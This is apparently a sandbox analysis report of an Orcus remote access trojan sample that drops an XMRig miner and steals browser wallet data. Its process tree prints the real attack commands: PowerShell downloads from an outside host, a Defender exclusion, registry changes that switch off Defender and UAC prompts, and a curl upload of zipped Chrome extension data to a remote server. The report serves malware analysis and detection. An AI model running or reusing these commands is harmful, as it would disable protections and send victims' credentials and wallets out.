orcus | 5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c

Analysis

max time kernel
98s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
08-12-2024 16:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe
Size

4.0MB
MD5

8b0fa2f9a7d3822c44580a49dd546c97
SHA1

e90ac8103e2877a3c607fd8e4bdcd4a132846015
SHA256

5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c
SHA512

2f168cfaf3cab1ab5cf274bc7983a64587fd26487fffa733393146e02ea609c0a0ed8f4527b58ad82416557afe91d1efa0b11afd35fbdfce7bc7a48a77c23680
SSDEEP

98304:MANuSZTKA0t9FFPEE6zTOwlRVny+pnp4huLe1ypSb3o9JCm:/bk9fcHiwVyWRi1ypS6JC

Score

10^/10

orcus ta505 xmrig defense_evasion discovery evasion execution miner persistence privilege_escalation rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://exodus.lat/COMSurrogate.exe

Extracted

Family

orcus

45.74.38.211:4782

Mutex

5473b263a5de48aaabfe373bccf83dd2

Attributes

autostart_method
Disable
enable_keylogger
false
install_path
%programfiles%\Orcus\Orcus.exe
reconnect_delay
10000
registry_keyname
Orcus
taskscheduler_taskname
Orcus
watchdog_path
AppData\OrcusWatchdog.exe

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral2/memory/2844-10-0x0000000005770000-0x000000000577A000-memory.dmp	disable_win_def

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe

Orcus
Orcus is a Remote Access Trojan that is being sold on underground forums.
rat spyware stealer orcus
Orcus family
orcus
TA505
Cybercrime group active since 2015, responsible for families like Dridex and Locky.
ta505
Ta505 family
ta505

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1"	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral2/files/0x000b000000023b6f-236.dat	family_xmrig
behavioral2/files/0x000b000000023b6f-236.dat	xmrig

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Orcurs Rat Executable 1 IoCs

resource	yara_rule
behavioral2/memory/2844-1-0x0000000000120000-0x0000000000526000-memory.dmp	orcus

Blocklisted process makes network request 2 IoCs

flow	pid	Process
19	3448	powershell.exe
20	5076	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4628	powershell.exe
4628	powershell.exe
5076	powershell.exe
3360	powershell.exe
3448	powershell.exe
2196	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe

Executes dropped EXE 3 IoCs

pid	Process
1472	smartscreen.exe
3196	COMSurrogate.exe
3172	mi.exe

Loads dropped DLL 1 IoCs

pid	Process
3172	mi.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\COM Surrogate = "C:\\Users\\Admin\\AppData\\Local\\asm\\COMSurrogate.exe"	COMSurrogate.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmartScreen = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smartscreen.exe"	smartscreen.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1"	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe

Hijack Execution Flow: Executable Installer File Permissions Weakness 1 TTPs 1 IoCs

Possible Turn off User Account Control's privilege elevation for standard users.

defense_evasion persistence privilege_escalation

Executable Installer File Permissions Weakness

T1574.005

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0"	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
22	api.ipify.org
23	api.ipify.org

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
2844	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe
2980	powershell.exe
2980	powershell.exe
4628	powershell.exe
4628	powershell.exe
3448	powershell.exe
3448	powershell.exe
5076	powershell.exe
5076	powershell.exe
3360	powershell.exe
3360	powershell.exe
2196	powershell.exe
2196	powershell.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	2844	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeDebugPrivilege	4628	powershell.exe
Token: SeDebugPrivilege	3448	powershell.exe
Token: SeDebugPrivilege	5076	powershell.exe
Token: SeDebugPrivilege	3360	powershell.exe
Token: SeDebugPrivilege	3196	COMSurrogate.exe
Token: SeDebugPrivilege	2196	powershell.exe
Token: SeLockMemoryPrivilege	3172	mi.exe
Token: SeLockMemoryPrivilege	3172	mi.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3172	mi.exe

Suspicious use of WriteProcessMemory 54 IoCs

description	pid	Process	procid_target
PID 2844 wrote to memory of 2980	2844	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe	83
PID 2844 wrote to memory of 2980	2844	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe	83
PID 2844 wrote to memory of 2980	2844	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe	83
PID 2844 wrote to memory of 3056	2844	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe	85
PID 2844 wrote to memory of 3056	2844	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe	85
PID 2844 wrote to memory of 3056	2844	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe	85
PID 3056 wrote to memory of 736	3056	cmd.exe	87
PID 3056 wrote to memory of 736	3056	cmd.exe	87
PID 3056 wrote to memory of 736	3056	cmd.exe	87
PID 736 wrote to memory of 1812	736	net.exe	88
PID 736 wrote to memory of 1812	736	net.exe	88
PID 736 wrote to memory of 1812	736	net.exe	88
PID 3056 wrote to memory of 4628	3056	cmd.exe	89
PID 3056 wrote to memory of 4628	3056	cmd.exe	89
PID 3056 wrote to memory of 4628	3056	cmd.exe	89
PID 2844 wrote to memory of 1724	2844	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe	90
PID 2844 wrote to memory of 1724	2844	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe	90
PID 2844 wrote to memory of 1724	2844	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe	90
PID 2844 wrote to memory of 1472	2844	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe	91
PID 2844 wrote to memory of 1472	2844	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe	91
PID 1724 wrote to memory of 3448	1724	cmd.exe	93
PID 1724 wrote to memory of 3448	1724	cmd.exe	93
PID 1724 wrote to memory of 3448	1724	cmd.exe	93
PID 3056 wrote to memory of 5076	3056	cmd.exe	94
PID 3056 wrote to memory of 5076	3056	cmd.exe	94
PID 3056 wrote to memory of 5076	3056	cmd.exe	94
PID 1724 wrote to memory of 3000	1724	cmd.exe	95
PID 1724 wrote to memory of 3000	1724	cmd.exe	95
PID 1724 wrote to memory of 3000	1724	cmd.exe	95
PID 3000 wrote to memory of 4412	3000	cmd.exe	97
PID 3000 wrote to memory of 4412	3000	cmd.exe	97
PID 3000 wrote to memory of 4412	3000	cmd.exe	97
PID 3056 wrote to memory of 3360	3056	cmd.exe	98
PID 3056 wrote to memory of 3360	3056	cmd.exe	98
PID 3056 wrote to memory of 3360	3056	cmd.exe	98
PID 3000 wrote to memory of 408	3000	cmd.exe	99
PID 3000 wrote to memory of 408	3000	cmd.exe	99
PID 3000 wrote to memory of 408	3000	cmd.exe	99
PID 408 wrote to memory of 5100	408	cmd.exe	100
PID 408 wrote to memory of 5100	408	cmd.exe	100
PID 408 wrote to memory of 5100	408	cmd.exe	100
PID 3360 wrote to memory of 3196	3360	powershell.exe	101
PID 3360 wrote to memory of 3196	3360	powershell.exe	101
PID 3000 wrote to memory of 2196	3000	cmd.exe	102
PID 3000 wrote to memory of 2196	3000	cmd.exe	102
PID 3000 wrote to memory of 2196	3000	cmd.exe	102
PID 3000 wrote to memory of 2848	3000	cmd.exe	105
PID 3000 wrote to memory of 2848	3000	cmd.exe	105
PID 3000 wrote to memory of 2848	3000	cmd.exe	105
PID 2848 wrote to memory of 4424	2848	cmd.exe	106
PID 2848 wrote to memory of 4424	2848	cmd.exe	106
PID 2848 wrote to memory of 4424	2848	cmd.exe	106
PID 3196 wrote to memory of 3172	3196	COMSurrogate.exe	113
PID 3196 wrote to memory of 3172	3196	COMSurrogate.exe	113

System policy modification 1 TTPs 7 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableUIADesktopToggle = "0"	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1"	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "0"	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0"	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0"	5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe

C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe
"C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Checks computer location settings
- Windows security modification
- Checks whether UAC is enabled
- Hijack Execution Flow: Executable Installer File Permissions Weakness
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2844
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2980
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\download.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3056
- - C:\Windows\SysWOW64\net.exe
    net session
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:736
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      System Location Discovery: System Language Discovery
      PID:1812
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4628
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5076
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3360
  - - C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe
      "C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3196
    - - C:\Users\Admin\AppData\Local\asm\mi.exe
        
        "C:\Users\Admin\AppData\Local\asm\mi.exe" --config="C:\Users\Admin\AppData\Local\asm\config.json"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:3172
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\runsteal.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1724
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3448
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3000
  - - C:\Windows\SysWOW64\xcopy.exe
      xcopy /E /I "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\"
      4⤵
      System Location Discovery: System Language Discovery
      Enumerates system info in registry
      PID:4412
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:408
    - - C:\Windows\SysWOW64\curl.exe
        
        curl -s https://api.ipify.org
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5100
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2196
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c curl -F "file=@C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip" "https://exodus.lat/files/upload.php"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2848
    - - C:\Windows\SysWOW64\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip" "https://exodus.lat/files/upload.php"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4424
- C:\Users\Admin\AppData\Local\Temp\smartscreen.exe
  "C:\Users\Admin\AppData\Local\Temp\smartscreen.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:1472

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

T1574.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

T1574.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

T1574.005

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
5634c6b6d376093db8be8fc0fffcb578

SHA1
0f88db2d2b257c9f57bf1623af58539505378589

SHA256
751657b98db0de40e7deb48406de29cff429e51af33cac2103d12c9c28f9061b

SHA512
5068e3ec66a54759f68eb85e1ff6f7e7ec719017cb9aa6ff2f8e8c965ce3c2c9f73dc043d084dd871d698f671a6eb6d88d13610cd51e1fce50b8997e441e0d03

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
55edeed315bd5ffc7e9b778b2ab646ac

SHA1
fb0211a11f97ad37d034777d9086dd9c3ec7d3bf

SHA256
a11fa5e81fafd4440a5ef8f6a05cd160674899bc3ecbcdf3798344ff1a086bdf

SHA512
4a9cccf5b0469b57a7a454f0a5abb6a14b328e0ab9b720971a681022d7793648a294c65cf3a370d25c661ffd322a8c6808b97a21d603188953f7e076f50457b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
10KB

MD5
269e0a97c12ce949f92dd3effcd6bdbe

SHA1
42bb1c608a4a93f8cf81b00889f67b2ca56d6376

SHA256
ba5d4fc7db6db73da9080c92cd11d9616f316fcf92ea15957d1c8134877700e9

SHA512
27ed9c88c3e336de77dfcda1675fe8b3a836b2d1223a87186b6082e762b707f20833b7076b9f7846c22f2d7573cc12d9166e8715d368dfa7d3e6b97ebcc0fc0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
70de2cb7546f63571c8e182832719af3

SHA1
19720349590fd365aa0ae089752b1fcae48911a7

SHA256
82d57d80064175e85b149dd878ce0bae46ca3057176698469251a24f542c1e68

SHA512
f961787629154b40d3388fc5ab15a00d622af98b0bc1632f986e2ad42c052416bd27563c0057a8c2b645651ee3215ae29154f599f579f09047b05573ab0583fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
e0860c23cb3d7ae4c25c7d29fab6501b

SHA1
b74d27e25add2eeca9e737ef0e4561872a75616b

SHA256
1936fe36e6969d4deb82cf4f31aec44a9b50cbc1de2e6be681d9fe1425469121

SHA512
ce34d24d7198ad18b5ab6c700610454bc272f6cd0f7e862c4d6bbe830f9ea616d299e0cabb9a0c8d76a3d5eb285da99b47e47d825e8a504302c44b6a65c4d6db

Download Submit
C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log

Filesize
68B

MD5
f67672c18281ad476bb09676baee42c4

SHA1
fb4e31c9a39545d822b2f18b0b87ca465e7768c9

SHA256
d96b3d82465808c49ce3c948745074d143504d00f44a9ff3b26a42f0c88e1f61

SHA512
ff37752848af570cb284f5fb65837472ddf9941992fffceb049a70c36d858c37e4e87016176b4e62d0eda63c235ca742411947d50d163cbc7823c50a734f0898

Download Submit
C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOG

Filesize
401B

MD5
02a1ce8f132857b9dea90f36f9b8d60a

SHA1
367958f4436ab55bdd1b083ba7a44eee741a6177

SHA256
